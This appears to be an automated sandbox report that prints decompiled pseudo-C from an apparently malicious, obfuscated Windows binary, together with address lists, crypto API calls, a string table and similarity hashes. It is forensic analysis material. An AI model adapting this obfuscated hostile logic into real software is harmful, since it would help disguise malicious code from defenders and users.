                                                									_t1515 = E004FEF38; // 0xc3c34fdc
                                                									 *0x4fef18 = E004EE798(_t1515, 0, _t1894, _v80, _t2140);
                                                									 *0x4feea0 = E004FEED0 * 0xec;
                                                									_t1981 = _t1514;
                                                									 *[fs:eax] = _t1981;
                                                									_push(E004F29AC);
                                                									if(_v80 + 0xed < _v40) {
                                                										_v88 = 0;
                                                										do {
                                                											E00407678(_v24, 0, 1,  &_v24);
                                                											_v88 = _v88 + 1;
                                                										} while (_v88 != 5);
                                                										if(_v48 - _v32 >= 0x4e) {
                                                											asm("fild dword [ebp-0x28]");
                                                											_v72 = E004048CC();
                                                										} else {
                                                											_v56 = _v68 - _v76;
                                                										}
                                                										_v32 = _v84 * _v48;
                                                									}
                                                									_t1521 =  *0x4feed8; // 0x1cb9338e
                                                									if(_t1521 -  *0x4fef18 >= 0x78) {
                                                										asm("fild dword [0x4fef18]");
                                                										 *0x4feefc = E004048D8();
                                                									} else {
                                                										asm("fild dword [ebp-0x3c]");
                                                										_v92 = E004048D8();
                                                										E00406CF4( &_v24, L"rtm.dll");
                                                										_v52 = 0;
                                                										while(_v52 < 0xd) {
                                                											_v52 = _v52 + 1;
                                                											_t1572 = E004FEF0C; // 0xb52124bf
                                                											 *0x4fef40 = _t1572 + 0x2c;
                                                										}
                                                									}
                                                									_t1524 =  *0x4feeec; // 0xb52124f2
                                                									 *0x4fef14 = _t1524 + E004FEF0C;
                                                									if(_v68 - _v60 >= _v68) {
                                                										_t1528 =  *0x4fef28 * 0xdc;
                                                										__eflags = _t1528;
                                                										 *0x4fef18 = _t1528;
                                                									} else {
                                                										_t1562 = E004FEF38; // 0xc3c34fdc
                                                										E004FEF38 = E0040489C(_t1562);
                                                										_t1564 =  *0x4fef18; // 0xbc3e19a
                                                										 *0x4fef40 = _t1564;
                                                										_t1565 = E004FEF38; // 0xc3c34fdc
                                                										_t2150 = _t1565 -  *0x4fef40; // 0x3c79b5d4
                                                										if(_t2150 < 0) {
                                                											E00406CF4( &_v24, _v24);
                                                										}
                                                									}
                                                									_t1529 = E004FEF20; // 0x6e687a1a
                                                									 *0x4fef4c = _t1529;
                                                									E004044D0(_v120);
                                                									_v76 = _v64 + 0x37;
                                                									_v84 = 0;
                                                									while(_v84 < 0xd) {
                                                										_v84 = _v84 + 1;
                                                										E00406CF4( &_v24, L"GetKeyboardState");
                                                									}
                                                									_v164 = _v24;
                                                									if(_v164 != 0) {
                                                										_v164 =  *((intOrPtr*)(_v164 - 4));
                                                									}
                                                									if(_v164 > 0x8d) {
                                                										_v56 = _v80 - _v60;
                                                										_t1548 =  *0x4fef1c; // 0x0
                                                										_v168 = _t1548;
                                                										if(_v168 != 0) {
                                                											_v168 =  *((intOrPtr*)(_v168 - 4));
                                                										}
                                                										if(_v168 <= 0x2f) {
                                                											__eflags = 0;
                                                											_v92 = 0;
                                                											do {
                                                												E004F0EBC(0x4feee8,  &_v84, __eflags);
                                                												_v92 = _v92 + 1;
                                                												__eflags = _v92 - 0xc;
                                                											} while (__eflags != 0);
                                                										} else {
                                                											_v72 = _v44 + _v68;
                                                										}
                                                									}
                                                									_t1536 =  *0x4feedc; // 0xbc3e19a
                                                									_t2159 = _t1536 - E004FEF0C -  *0x4fef14; // 0xb52124ca
                                                									if(_t2159 != 0) {
                                                										_t1538 = E004FEF34; // 0xc3c34ef0
                                                										 *0x4feecc = _t1538;
                                                										_t1539 =  *0x4feefc * 0x4f;
                                                										__eflags = _t1539;
                                                										 *0x4feef0 = _t1539;
                                                									} else {
                                                										_v88 = _v36;
                                                									}
                                                									_t1540 =  *0x4feef4; // 0xb52124ca
                                                									E004FEF2C = _t1540 + 4;
                                                									_t1542 =  *0x4feedc; // 0xbc3e19a
                                                									_push(_t1542);
                                                									_t1897 =  *0x4feef4; // 0xb52124ca
                                                									_t1544 = E004EE798(_v72, 0, _t1897, _v40, _t1540 + 4);
                                                									 *0x4feef4 = _t1544;
                                                									return _t1544;
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				goto L289;
                                                			}

                                                0x004f1697
                                                0x004f169e
                                                0x004f16a0
                                                0x004f16a3
                                                0x004f16a8
                                                0x004f16ad
                                                0x004f169e
                                                0x004f16cf
                                                0x004f16de
                                                0x004f16e3
                                                0x004f16e4
                                                0x004f16e9
                                                0x004f16ec
                                                0x004f16f5
                                                0x004f16fe
                                                0x004f1707
                                                0x004f170c
                                                0x004f1713
                                                0x004f1715
                                                0x004f171a
                                                0x004f171d
                                                0x004f1721
                                                0x004f1723
                                                0x004f1729
                                                0x004f172a
                                                0x004f1730
                                                0x004f1736
                                                0x004f1740
                                                0x004f1745
                                                0x004f1721
                                                0x004f1755
                                                0x004f1758
                                                0x004f175e
                                                0x004f1761
                                                0x004f1764
                                                0x004f1774
                                                0x004f1784
                                                0x004f1796
                                                0x004f179b
                                                0x004f17a2
                                                0x004f17a4
                                                0x004f17b5
                                                0x004f17c1
                                                0x004f17c4
                                                0x004f17c9
                                                0x004f17d0
                                                0x004f17d7
                                                0x004f17d9
                                                0x004f17dc
                                                0x004f17e4
                                                0x004f17e7
                                                0x004f17ed
                                                0x004f17f5
                                                0x004f17fa
                                                0x004f17fd
                                                0x004f180b
                                                0x004f1810
                                                0x004f1813
                                                0x004f182c
                                                0x004f182f
                                                0x004f183a
                                                0x004f183f
                                                0x004f184a
                                                0x004f1850
                                                0x004f1852
                                                0x004f185a
                                                0x004f185a
                                                0x004f1868
                                                0x004f187b
                                                0x004f1886
                                                0x004f188c
                                                0x004f18a0
                                                0x004f18a5
                                                0x004f18a5
                                                0x004f18a8
                                                0x004f188e
                                                0x004f188e
                                                0x004f1899
                                                0x004f1899
                                                0x004f186a
                                                0x004f186a
                                                0x004f1874
                                                0x004f1874
                                                0x004f18bb
                                                0x004f18c0
                                                0x004f18c8
                                                0x004f18d1
                                                0x004f18da
                                                0x004f18dd
                                                0x004f18e2
                                                0x004f18e7
                                                0x004f18ec
                                                0x004f18f7
                                                0x004f18fa
                                                0x004f1901
                                                0x004f190b
                                                0x004f1912
                                                0x004f1915
                                                0x004f1919
                                                0x004f191b
                                                0x004f1926
                                                0x004f1936
                                                0x004f1936
                                                0x004f1943
                                                0x004f1948
                                                0x004f195a
                                                0x004f1960
                                                0x004f1967
                                                0x004f1971
                                                0x004f197b
                                                0x004f1990
                                                0x004f1998
                                                0x004f2b1d
                                                0x004f2b1f
                                                0x004f2b28
                                                0x004f2b2d
                                                0x004f2b32
                                                0x004f2b38
                                                0x004f2b3f
                                                0x004f2b47
                                                0x004f2b47
                                                0x004f2b4c
                                                0x004f2b4c
                                                0x004f2b52
                                                0x004f2b59
                                                0x004f2b7f
                                                0x004f2b7f
                                                0x004f2b82
                                                0x004f2b88
                                                0x004f2b93
                                                0x004f2b5b
                                                0x004f2b5b
                                                0x004f2b60
                                                0x004f2b61
                                                0x004f2b67
                                                0x004f2b6d
                                                0x004f2b77
                                                0x004f2b77
                                                0x004f2b96
                                                0x004f2b9b
                                                0x004f2bb5
                                                0x004f2bbe
                                                0x004f2bc7
                                                0x004f2bca
                                                0x004f2bcf
                                                0x004f2bd5
                                                0x004f2bdc
                                                0x004f2be4
                                                0x004f2be4
                                                0x004f2be9
                                                0x004f2be9
                                                0x004f2bef
                                                0x004f2bf9
                                                0x004f2c07
                                                0x004f2c0c
                                                0x004f2bfb
                                                0x004f2bfb
                                                0x004f2c00
                                                0x004f2c00
                                                0x004f2c13
                                                0x004f2c16
                                                0x004f2c19
                                                0x004f2c26
                                                0x004f2c33
                                                0x004f2c3c
                                                0x004f2c3f
                                                0x004f2c49
                                                0x004f2c4e
                                                0x004f2c53
                                                0x004f2c58
                                                0x004f2c5d
                                                0x004f2c63
                                                0x004f2c6a
                                                0x004f2c6d
                                                0x004f2c6d
                                                0x004f2c73
                                                0x004f2c73
                                                0x004f2c76
                                                0x004f2c79
                                                0x004f2c7e
                                                0x004f2c8b
                                                0x004f199e
                                                0x004f19a6
                                                0x004f19ac
                                                0x004f19b7
                                                0x004f19c0
                                                0x004f19c6
                                                0x004f19cb
                                                0x004f19ce
                                                0x004f19dc
                                                0x004f19e4
                                                0x004f19e7
                                                0x004f19ea
                                                0x004f19f2
                                                0x004f19f9
                                                0x004f19fb
                                                0x004f1a05
                                                0x004f1a0a
                                                0x004f1a24
                                                0x004f1a2c
                                                0x004f2a7b
                                                0x004f2a86
                                                0x004f2a8b
                                                0x004f2a90
                                                0x004f2a97
                                                0x004f2a9a
                                                0x004f2a9a
                                                0x004f2aa3
                                                0x004f2aa6
                                                0x004f2ab0
                                                0x004f2ab5
                                                0x004f2aba
                                                0x004f2abf
                                                0x004f2ac4
                                                0x004f2aca
                                                0x004f2acf
                                                0x004f2acf
                                                0x004f2ad2
                                                0x004f2ad2
                                                0x004f2ad5
                                                0x004f2ada
                                                0x004f2ae7
                                                0x004f2aed
                                                0x004f2af8
                                                0x004f2b08
                                                0x004f2b0d
                                                0x004f2b12
                                                0x004f2b17
                                                0x004f2b17
                                                0x004f2b1a
                                                0x004f2b1a
                                                0x00000000
                                                0x004f1a32
                                                0x004f1a35
                                                0x004f1a3e
                                                0x004f1a47
                                                0x004f1a4c
                                                0x004f1a4f
                                                0x004f1a53
                                                0x004f1a55
                                                0x004f1a5b
                                                0x004f1a62
                                                0x004f1a6c
                                                0x004f1a71
                                                0x004f1a7d
                                                0x004f1a84
                                                0x004f1a89
                                                0x004f1a8a
                                                0x004f1a8f
                                                0x004f1a92
                                                0x004f1aa5
                                                0x004f1aac
                                                0x004f1aaf
                                                0x004f1ab4
                                                0x004f1ab9
                                                0x004f1ac3
                                                0x004f1ac8
                                                0x004f1acd
                                                0x004f1ad3
                                                0x004f1ad5
                                                0x004f1add
                                                0x004f1ae7
                                                0x004f1af2
                                                0x004f1afd
                                                0x004f1afd
                                                0x004f1b00
                                                0x004f1b0a
                                                0x004f1b0f
                                                0x004f1b17
                                                0x004f1b1c
                                                0x004f1b27
                                                0x004f1b2c
                                                0x004f1b31
                                                0x004f1b38
                                                0x004f1b39
                                                0x004f1b3e
                                                0x004f1b41
                                                0x004f1b48
                                                0x004f1b4d
                                                0x004f1b50
                                                0x004f1b52
                                                0x004f1b55
                                                0x004f1b63
                                                0x004f1b68
                                                0x004f1b6b
                                                0x004f1b71
                                                0x004f1b76
                                                0x004f1b7b
                                                0x004f1b80
                                                0x004f1b85
                                                0x004f1b88
                                                0x004f1b96
                                                0x004f1b9b
                                                0x004f1ba2
                                                0x004f1ba4
                                                0x004f1ba9
                                                0x004f1bb0
                                                0x004f1bb2
                                                0x004f1bb5
                                                0x004f1bba
                                                0x004f1bbf
                                                0x004f1bcc
                                                0x004f1bcf
                                                0x004f1be3
                                                0x004f1be8
                                                0x004f1bf2
                                                0x004f1c01
                                                0x004f1c02
                                                0x004f1c05
                                                0x004f1c0e
                                                0x004f1c11
                                                0x004f1c16
                                                0x004f1c1b
                                                0x004f1c25
                                                0x004f1c2a
                                                0x004f1c2f
                                                0x004f1c35
                                                0x004f1c83
                                                0x004f1c8d
                                                0x004f1c37
                                                0x004f1c37
                                                0x004f1c3c
                                                0x004f1c44
                                                0x004f1c47
                                                0x004f1c4c
                                                0x004f1c53
                                                0x004f1c5a
                                                0x004f1c5c
                                                0x004f1c67
                                                0x004f1c6d
                                                0x004f1c78
                                                0x004f1c7b
                                                0x004f1c5a
                                                0x004f1c92
                                                0x004f1c97
                                                0x004f1c9f
                                                0x004f1cac
                                                0x004f1cb9
                                                0x004f1cb9
                                                0x004f1cc6
                                                0x004f1cd0
                                                0x004f1cd0
                                                0x004f1cd8
                                                0x004f1ce4
                                                0x004f1ced
                                                0x004f1cf2
                                                0x004f1cf9
                                                0x004f1cfb
                                                0x004f1d00
                                                0x004f1d03
                                                0x004f1d07
                                                0x004f1d09
                                                0x004f1d0c
                                                0x004f1d11
                                                0x004f1d15
                                                0x004f1d1e
                                                0x004f1d23
                                                0x004f1d29
                                                0x004f1d35
                                                0x004f1d3e
                                                0x004f1d41
                                                0x004f1d4c
                                                0x004f1d53
                                                0x004f1d5b
                                                0x004f1d64
                                                0x004f1d72
                                                0x004f1d9f
                                                0x004f1da2
                                                0x004f1dcd
                                                0x004f1dd0
                                                0x004f1dd5
                                                0x004f1dd5
                                                0x004f1dd8
                                                0x004f1da4
                                                0x004f1da4
                                                0x004f1da6
                                                0x004f1da9
                                                0x004f1db7
                                                0x004f1dbc
                                                0x004f1dbf
                                                0x004f1dbf
                                                0x004f1dc5
                                                0x004f1de4
                                                0x004f1de9
                                                0x004f1dee
                                                0x004f1dee
                                                0x004f1df1
                                                0x004f1df6
                                                0x004f1dfb
                                                0x004f1d74
                                                0x004f1d76
                                                0x004f1d7d
                                                0x004f1d7f
                                                0x004f1d8a
                                                0x004f1d8d
                                                0x004f1d97
                                                0x004f1d97
                                                0x004f1e00
                                                0x004f1e05
                                                0x004f1e0a
                                                0x004f1e0f
                                                0x004f1e14
                                                0x004f1e1e
                                                0x004f1e23
                                                0x004f1e2b
                                                0x00000000
                                                0x004f2455
                                                0x004f2459
                                                0x004f2467
                                                0x00000000
                                                0x00000000
                                                0x004f245b
                                                0x004f245b
                                                0x004f245f
                                                0x004f1e35
                                                0x004f1e35
                                                0x004f1e39
                                                0x004f1e46
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004f1e3b
                                                0x004f1e3b
                                                0x004f1e42
                                                0x004f1e98
                                                0x004f1ea0
                                                0x004f1ea9
                                                0x004f1eaf
                                                0x004f1eba
                                                0x004f1ec9
                                                0x004f1ecb
                                                0x004f1f03
                                                0x004f1f08
                                                0x004f1f08
                                                0x004f1f0d
                                                0x004f1ecd
                                                0x004f1ecf
                                                0x004f1ed2
                                                0x004f1ed6
                                                0x004f1ed8
                                                0x004f1ee1
                                                0x004f1ee4
                                                0x004f1ee4
                                                0x004f1ef2
                                                0x004f1efc
                                                0x004f1efc
                                                0x004f1f12
                                                0x004f1f17
                                                0x004f1f1c
                                                0x004f1f21
                                                0x004f1f21
                                                0x004f1f26
                                                0x004f1f2b
                                                0x004f1f36
                                                0x004f1f3e
                                                0x004f1e44
                                                0x004f1e48
                                                0x004f1e48
                                                0x004f1e4d
                                                0x004f1e52
                                                0x004f1e57
                                                0x004f1e64
                                                0x004f1e67
                                                0x004f1e6c
                                                0x004f1e77
                                                0x004f1e82
                                                0x004f1e90
                                                0x004f1e90
                                                0x004f1e42
                                                0x004f1f43
                                                0x004f1f46
                                                0x004f1f4a
                                                0x004f1f4c
                                                0x004f1f55

                                                APIs
                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,0000005D,00000000,004F30C8,?,00000254,00000000,004F31F8), ref: 004F11C3
                                                • CryptImportKey.ADVAPI32(?,004FC554,00000254,00000000,00000000,?,?,00000000,004F2FF6,?,?,00000254,00000000,004F31F8), ref: 004F12E7
                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,004F2EFA,?,44632301,?,?,00000254,00000000,004F31F8), ref: 004F13CE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: Crypt$AcquireContext$Import
                                                • String ID: /$CNB_0309.DLL$CNB_0317.DLL$GetKeyboardState$Microsoft.WSMan.Management.ni.dll$NetEnumerateServiceAccounts$System.Runtime.Remoting.dll$WcnEapPeerProxy.dll$WininetPlugin.dll$api-ms-win-core-datetime-l1-1-0.dll$api-ms-win-core-util-l1-1-0.dll$davclnt.dll$dmintf.dll$dxmasf.dll$mqcertui.dll$repdrvfs.dll$rtm.dll
                                                • API String ID: 3710563934-681767285
                                                • Opcode ID: 02e48a48f09d573dc4ab70e182b3af70aaabd177087fe64a82d3fdabe1f78294
                                                • Instruction ID: 5a1a609fc73b505021b261c3b840208a3c67837b18326f053143dae08eb1a50b
                                                • Opcode Fuzzy Hash: 02e48a48f09d573dc4ab70e182b3af70aaabd177087fe64a82d3fdabe1f78294
                                                • Instruction Fuzzy Hash: 1D23E275D00249DFDB00DFAAE984AADBBF1FB08306F10843AE505E7265D778A951CF29
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 69%
                                                			E004F5C80(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                				char _v8;
                                                				intOrPtr _v12;
                                                				char _v16;
                                                				signed int _v20;
                                                				char _v24;
                                                				signed int _v28;
                                                				char _v32;
                                                				char _v36;
                                                				long* _v40;
                                                				char _v44;
                                                				char _v48;
                                                				char _v52;
                                                				intOrPtr _v56;
                                                				intOrPtr _v60;
                                                				signed int _v64;
                                                				signed int _v68;
                                                				signed int _v72;
                                                				intOrPtr _t138;
                                                				signed int _t141;
                                                				signed int _t142;
                                                				int _t147;
                                                				signed int _t148;
                                                				signed int _t150;
                                                				signed int _t152;
                                                				signed int _t165;
                                                				signed int _t167;
                                                				intOrPtr _t169;
                                                				signed int _t173;
                                                				signed int _t177;
                                                				signed int _t180;
                                                				void* _t184;
                                                				signed int _t185;
                                                				intOrPtr _t186;
                                                				signed int _t188;
                                                				signed int _t190;
                                                				signed int _t191;
                                                				signed int _t192;
                                                				signed int _t194;
                                                				signed int _t195;
                                                				signed int _t196;
                                                				intOrPtr _t197;
                                                				signed int _t208;
                                                				signed int _t213;
                                                				signed int _t215;
                                                				signed int _t217;
                                                				signed int _t218;
                                                				signed int _t220;
                                                				signed int _t222;
                                                				signed int _t223;
                                                				signed int _t227;
                                                				signed int _t230;
                                                				signed int _t234;
                                                				signed int _t235;
                                                				signed int _t237;
                                                				signed int _t241;
                                                				signed int _t242;
                                                				signed int _t243;
                                                				signed int _t245;
                                                				signed int _t247;
                                                				void* _t254;
                                                				signed int _t255;
                                                				signed int _t258;
                                                				signed int _t260;
                                                				signed int _t262;
                                                				signed int _t272;
                                                				signed int _t279;
                                                				signed int _t281;
                                                				signed int _t282;
                                                				signed int _t288;
                                                				signed int _t290;
                                                				signed int _t291;
                                                				signed int _t293;
                                                				signed int _t296;
                                                				signed int _t297;
                                                				signed int _t300;
                                                				signed int _t309;
                                                				signed int _t311;
                                                				signed int _t312;
                                                				signed int _t319;
                                                				signed int _t320;
                                                				signed int _t326;
                                                				signed int _t328;
                                                				signed int _t332;
                                                				signed int _t337;
                                                				signed int _t340;
                                                				signed int _t342;
                                                				signed int _t343;
                                                				signed int _t344;
                                                				signed int _t348;
                                                				signed int _t350;
                                                				signed int _t354;
                                                				signed int _t355;
                                                				signed int _t358;
                                                				signed int _t361;
                                                				signed int _t364;
                                                				signed int _t366;
                                                				signed int _t374;
                                                				signed int _t375;
                                                				signed int _t377;
                                                				signed int _t378;
                                                				signed int _t379;
                                                				signed int _t380;
                                                				signed int _t382;
                                                				signed int _t383;
                                                				signed int _t385;
                                                				signed int _t390;
                                                				signed int _t391;
                                                				signed int _t392;
                                                				signed int _t394;
                                                				signed int _t402;
                                                				signed int _t407;
                                                				signed int _t413;
                                                				intOrPtr _t420;
                                                				intOrPtr _t421;
                                                				char _t422;
                                                				intOrPtr _t426;
                                                				intOrPtr _t428;
                                                				intOrPtr _t435;
                                                				signed int _t439;
                                                				void* _t453;
                                                				void* _t454;
                                                				intOrPtr _t455;
                                                				void* _t460;
                                                				void* _t462;
                                                				signed int _t463;
                                                				void* _t473;
                                                				void* _t481;
                                                				void* _t485;
                                                
                                                				_t451 = __esi;
                                                				_t450 = __edi;
                                                				_t396 = __ebx;
                                                				_t453 = _t454;
                                                				_t455 = _t454 + 0xffffffbc;
                                                				_push(__ebx);
                                                				_push(__esi);
                                                				_push(__edi);
                                                				_v16 = 0;
                                                				_v20 = 0;
                                                				_v24 = 0;
                                                				_v28 = 0;
                                                				_v32 = 0;
                                                				_v52 = 0;
                                                				_v12 = __edx;
                                                				_v8 = __eax;
                                                				E00406A9C(_v8);
                                                				_push(_t453);
                                                				_push(0x4f6673);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t455;
                                                				_t138 =  *0x4fef48; // 0xc3c34ef0
                                                				_v72 = _t138 + 0x49;
                                                				asm("fild dword [ebp-0x44]");
                                                				E004FEF34 = E004048CC();
                                                				_t141 =  *0x4feeec; // 0xb52124f2
                                                				 *0x4fef44 = _t141;
                                                				_t142 = E004FEF34; // 0xc3c34ef0
                                                				E004FEF50 = (_t142 << 2) + (_t142 << 2) * 4;
                                                				_push(_t453);
                                                				_push(0x4f65dc);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t455;
                                                				_t147 = CryptAcquireContextA( &_v40, 0, 0, 1, 0xf0000000); // executed
                                                				if(_t147 == 0) {
                                                					_t148 =  *0x4feecc; // 0xd26bafe0
                                                					E004FEF0C = _t148;
                                                					asm("fild dword [0x4fef14]");
                                                					 *0x4fef18 = E004048CC();
                                                					_t150 =  *0x4fef44; // 0x38993
                                                					 *0x4fef30 = _t150;
                                                					_t152 =  *0x4feefc; // 0x4b08dcc7
                                                					E004FEF38 = _t152 + 0x33;
                                                					E00406CF4( &_v32, L"iaspolcy.dll");
                                                					_pop(_t420);
                                                					 *[fs:eax] = _t420;
                                                					__eflags = 0;
                                                					_pop(_t421);
                                                					 *[fs:eax] = _t421;
                                                					_push(E004F667A);
                                                					_t422 = "`\\O"; // 0x4f5c60
                                                					E0040859C( &_v52, _t422);
                                                					E00406A08( &_v32, 5);
                                                					return E004069CC( &_v8);
                                                				} else {
                                                					 *0x4fef18 = E004FEF10 * 0xa7;
                                                					_t165 =  *0x4fef3c; // 0x1cb932a9
                                                					 *0x4fef30 = _t165 + 0x40;
                                                					_t167 =  *0x4feed8; // 0x1cb9338e
                                                					 *0x4fef3c = _t167 + 0xd8;
                                                					_t169 =  *0x4fef48; // 0xc3c34ef0
                                                					 *0x4fef48 = E0040489C(_t169);
                                                					 *0x4feea0 =  *0x4feed8 * 0x3c;
                                                					 *[fs:eax] = _t455;
                                                					_t173 = E004FEED0; // 0xc3c34ef0
                                                					E004FEF00 = _t173 *  *0x4feef4;
                                                					E00406CF4( &_v24, L"Microsoft.WSMan.Management.dll");
                                                					_t177 =  *0x4feea0; // 0xa1d900
                                                					E004FEF38 = _t177;
                                                					 *0x4fef44 = 0x67 -  *0x4feef4;
                                                					_t180 = E004FEF10; // 0x1cb931c0
                                                					 *0x4feecc = _t180 + 0x65;
                                                					_t184 =  *0x505974(_v40, 0x8003, 0, 0,  &_v44,  *[fs:eax], 0x4f6587, _t453); // executed
                                                					if(_t184 == 0) {
                                                						_t185 =  *0x4fef28; // 0x3c79b5d4
                                                						 *0x4feecc = _t185;
                                                						_t186 =  *0x4feea8; // 0x0
                                                						_t426 =  *0x4feec4; // 0x0
                                                						E00407640(_t186, _t426);
                                                						if(__eflags == 0) {
                                                							E004F0EBC( &_v36,  &E004FEF38, __eflags);
                                                							_t234 =  *0x4fef04 * 0x8a;
                                                							__eflags = _t234;
                                                							 *0x4feeec = _t234;
                                                							_t235 = E004FEED0; // 0xc3c34ef0
                                                							 *0x4feef4 = _t235;
                                                							asm("fild dword [0x4fef18]");
                                                							 *0x4fef04 = E004048CC();
                                                						}
                                                						_t188 =  *0x4fef18; // 0xbc3e19a
                                                						E004FEF20 = _t188 +  *0x4fef40;
                                                						_t190 =  *0x4feeb8; // 0x0
                                                						_v64 = _t190;
                                                						__eflags = _v64;
                                                						if(_v64 != 0) {
                                                							_t230 = _v64 - 4;
                                                							__eflags = _t230;
                                                							_v64 =  *_t230;
                                                						}
                                                						__eflags = _v64 - 0x53;
                                                						if(_v64 != 0x53) {
                                                							_t191 = E004FEF0C; // 0xb52124bf
                                                							_t192 = _t191 + 4;
                                                							__eflags = _t192;
                                                							_v72 = _t192;
                                                							asm("fild dword [ebp-0x44]");
                                                							 *0x4feefc = E004048D8();
                                                						} else {
                                                							_t222 =  *0x4fef30; // 0xa1d816
                                                							E004FEF38 = _t222;
                                                							_t223 = E004FEF38; // 0xc3c34fdc
                                                							__eflags = _t223 -  *0x4feef4; // 0xb52124ca
                                                							if(__eflags >= 0) {
                                                								E00407678(_v16, 0, 1,  &_v16);
                                                							} else {
                                                								_t227 = E004FEF2C; // 0xa1d900
                                                								 *0x4fef4c = _t227 + 4;
                                                							}
                                                						}
                                                						_t194 = E004FEF38; // 0xc3c34fdc
                                                						E004FEF10 = _t194;
                                                						_t195 = E004FEF10; // 0x1cb931c0
                                                						_push(_t195);
                                                						_t196 =  *0x4fef18; // 0xbc3e19a
                                                						_push(_t196);
                                                						_t197 =  *0x4fef48; // 0xc3c34ef0
                                                						_t402 =  *0x4feeec; // 0xb52124f2
                                                						 *0x4fef4c = E004F5954(_v36, _t396, _t402, _v36, __eflags);
                                                						_t428 = _t197;
                                                						 *[fs:eax] = _t428;
                                                						_push(E004F6591);
                                                						_v68 = _v20;
                                                						__eflags = _v68;
                                                						if(_v68 != 0) {
                                                							_t220 = _v68 - 4;
                                                							__eflags = _t220;
                                                							_v68 =  *_t220;
                                                						}
                                                						__eflags = _v68 - 0x35;
                                                						if(_v68 == 0x35) {
                                                							_t213 =  *0x4feea0; // 0xa1d900
                                                							 *0x4feea0 = E0040489C(_t213);
                                                							_t215 =  *0x4feee8; // 0xdcd0f434
                                                							 *0x4feedc = _t215 + 0x77;
                                                							_t217 =  *0x4feefc; // 0x4b08dcc7
                                                							_t218 = _t217 + 4;
                                                							__eflags = _t218;
                                                							 *0x4feef0 = _t218;
                                                						}
                                                						E004FEF10 =  *0x4feef4 * 0xd9;
                                                						 *0x4fef28 = 0x72 - E004FEF2C;
                                                						 *0x4fef04 = E004F356C( &_v36, _t396,  &_v36, 0x4feef4,  &_v36);
                                                						_t208 =  *0x4fef28 * 0xd6;
                                                						__eflags = _t208;
                                                						 *0x4fef3c = _t208;
                                                						E00406CF4( &_v32, _v20);
                                                						return CryptReleaseContext(_v40, 0);
                                                					} else {
                                                						_t237 =  *0x4fef04; // 0x43c14963
                                                						E004FEF20 = _t237 + 0x92;
                                                						if(_v36 - _v36 == _v36) {
                                                							_t392 = E004FEF38; // 0xc3c34fdc
                                                							_t460 = _t392 -  *0x4feefc - E004FEF38; // 0xc3c34fdc
                                                							if(_t460 < 0) {
                                                								_t394 =  *0x4fef18; // 0xbc3e19a
                                                								 *0x4fef4c = _t394 - 0xf5;
                                                							}
                                                						}
                                                						_t241 =  *0x4fef14; // 0xb52124ca
                                                						 *0x4feedc = _t241;
                                                						_t242 =  *0x4feefc; // 0x4b08dcc7
                                                						 *0x4feee0 = _t242;
                                                						_t243 =  *0x4feedc; // 0xbc3e19a
                                                						_t462 = _t243 -  *0x4feee0; // 0x747938b
                                                						if(_t462 > 0) {
                                                							_t390 =  *0x4feef4; // 0xb52124ca
                                                							_t391 = _t390 + 4;
                                                							_t463 = _t391;
                                                							 *0x4feefc = _t391;
                                                						}
                                                						_push(_v36);
                                                						_t407 =  *0x4feefc; // 0x4b08dcc7
                                                						_t245 =  *0x4feef0; // 0x44632301
                                                						E004EE798(_t245, _t396, _t407, _v36, _t463);
                                                						_t247 =  *0x4fef18; // 0xbc3e19a
                                                						 *0x4fef18 = E0040489C(_t247);
                                                						_push(_t453);
                                                						_push(0x4f632a);
                                                						_push( *[fs:eax]);
                                                						 *[fs:eax] = _t455;
                                                						_v56 = _v8;
                                                						if(_v56 != 0) {
                                                							_v56 =  *((intOrPtr*)(_v56 - 4));
                                                						}
                                                						_t254 =  *0x505978(_v44, _v8, _v56, 0);
                                                						_t466 = _t254;
                                                						if(_t254 != 0) {
                                                							_t290 = E004FEF10; // 0x1cb931c0
                                                							_push(_t290);
                                                							_t291 =  *0x4feea0; // 0xa1d900
                                                							_push(_t291);
                                                							_push(_v36);
                                                							_t413 = E004FEF34; // 0xc3c34ef0
                                                							_t439 = E004FEF20; // 0x6e687a1a
                                                							_t293 =  *0x4feedc; // 0xbc3e19a
                                                							E004F5954(_t293, _t396, _t413, _t439, _t466);
                                                							_v36 = 0;
                                                							while(_v36 < 6) {
                                                								_v36 = _v36 + 1;
                                                								_t382 =  *0x4feecc; // 0xd26bafe0
                                                								 *0x4fef14 = _t382;
                                                								_t383 =  *0x4feee0; // 0x747938b
                                                								E004FEF2C = _t383 + 4;
                                                								_t385 = E004FEF10; // 0x1cb931c0
                                                								 *0x4fef3c = _t385 -  *0x4fef18;
                                                							}
                                                							_t296 = E004FEF0C; // 0xb52124bf
                                                							E004FEF50 = _t296;
                                                							_t297 =  *0x4fef3c; // 0x1cb932a9
                                                							_v72 = _t297 + 0x78;
                                                							asm("fild dword [ebp-0x44]");
                                                							 *0x4feed8 = E004048CC();
                                                							_t300 =  *0x4fef4c; // 0x43c1493c
                                                							 *0x4feef0 = _t300 + 0x77;
                                                							_push(0);
                                                							_push( &_v48);
                                                							_push(0);
                                                							_push(2);
                                                							_push(_v44);
                                                							if( *0x50597c() != 0) {
                                                								_push(_v48);
                                                								E00408478();
                                                								_v36 = 0;
                                                								do {
                                                									_t319 =  *0x4fef40; // 0x3c79b5d4
                                                									 *0x4feea0 = _t319;
                                                									_t320 =  *0x4fef14; // 0xb52124ca
                                                									E004FEED0 = _t320;
                                                									 *0x4feee8 =  *0x4fef40 * 0x6d;
                                                									 *0x4feefc = E004FEF50 * 0x6b;
                                                									 *0x4fef14 =  *0x4feed8 * 0x6a;
                                                									_v36 = _v36 + 1;
                                                								} while (_v36 != 6);
                                                								E004FEF38 = 0x9a - E004FEF38;
                                                								_t326 =  *0x4fef40; // 0x3c79b5d4
                                                								if(_t326 - E004FEF38 < 0x3b) {
